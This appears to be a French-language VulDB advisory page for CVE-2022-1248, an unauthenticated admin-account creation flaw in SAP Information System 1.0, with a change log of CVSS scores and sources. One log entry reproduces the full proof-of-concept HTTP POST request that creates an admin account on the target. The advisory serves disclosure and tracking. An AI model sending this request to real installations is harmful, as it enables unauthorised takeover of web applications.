SAP Information System 1.0 POST Request add_admin.php authentification faible

Une vulnérabilité a été trouvé dans SAP Information System 1.0 et classée critique. Affecté par ce problème est une fonction inconnue du fichier /SAP_Information_System/controllers/add_admin.php du composant POST Request Handler. La manipulation avec une valeur d'entrée inconnue mène à une vulnérabilité de classe authentification faible. Cette vulnérabilité a été nommée CVE-2022-1248. Il est possible d'initialiser l'attaque à distance. Des details techniques sont connus. Il est déclaré comme proof-of-concept. L'exploit est disponible au téléchargment sur vuldb.com. Une solution envisageable a été publiée même avant, et non après après la publication de la vulnérabilité.

Chronologie

Utilisateur

130
243792

Domaine

exploit_sourcecode2
vulnerability_cvss3_meta_tempscore2
exploit_publicity1
source_cve_nvd_summary1
vulnerability_cvss3_cna_basescore1

Commit Conf

90%29
70%10
50%10
100%3

Approve Conf

90%29
70%10
80%10
100%1
IDEngagéUtilisateurDomaineChangementRemarquesAcceptéStatutC
1235701909/04/2022mrempysourcecode10/04/2022we declare full http recordings as PoC exploit
0
1235701809/04/2022mrempypublicity010/04/2022we declare full http recordings as PoC exploit
0
1235094608/04/2022VulD...cve_nvd_summaryA vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed.cvedetails.com08/04/2022accepté
70
1235094508/04/2022VulD...cvss3_cna_basescore7.3see CVSS documentation08/04/2022accepté
90
1235094408/04/2022VulD...cvss3_meta_tempscore6.9see CVSS documentation08/04/2022accepté
90
1235094308/04/2022VulD...cve_cnaVulDBnvd.nist.gov08/04/2022accepté
70
1235094208/04/2022VulD...cvss3_cna_aLnvd.nist.gov08/04/2022accepté
70
1235094108/04/2022VulD...cvss3_cna_iLnvd.nist.gov08/04/2022accepté
70
1235094008/04/2022VulD...cvss3_cna_cLnvd.nist.gov08/04/2022accepté
70
1235093908/04/2022VulD...cvss3_cna_sUnvd.nist.gov08/04/2022accepté
70
1235093808/04/2022VulD...cvss3_cna_uiNnvd.nist.gov08/04/2022accepté
70
1235093708/04/2022VulD...cvss3_cna_prNnvd.nist.gov08/04/2022accepté
70
1235093608/04/2022VulD...cvss3_cna_acLnvd.nist.gov08/04/2022accepté
70
1235093508/04/2022VulD...cvss3_cna_avNnvd.nist.gov08/04/2022accepté
70
1234732606/04/2022VulD...sourcecodePOST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI--06/04/2022accepté
100
1234691006/04/2022VulD...price_0day$0-$5ksee exploit price documentation06/04/2022accepté
90
1234690906/04/2022VulD...cvss3_meta_tempscore6.6see CVSS documentation06/04/2022accepté
90
1234690806/04/2022VulD...cvss3_meta_basescore7.3see CVSS documentation06/04/2022accepté
90
1234690706/04/2022VulD...cvss3_vuldb_tempscore6.6see CVSS documentation06/04/2022accepté
90
1234690606/04/2022VulD...cvss3_vuldb_basescore7.3see CVSS documentation06/04/2022accepté
90

32 plus d'entrées ne sont pas affichées

🔒 Login Required

You need to signup and login to see more of the remaining 32 results.

PrécédentAperçuSuivant

Want to stay up to date on a daily basis?

Enable the mail alert feature now!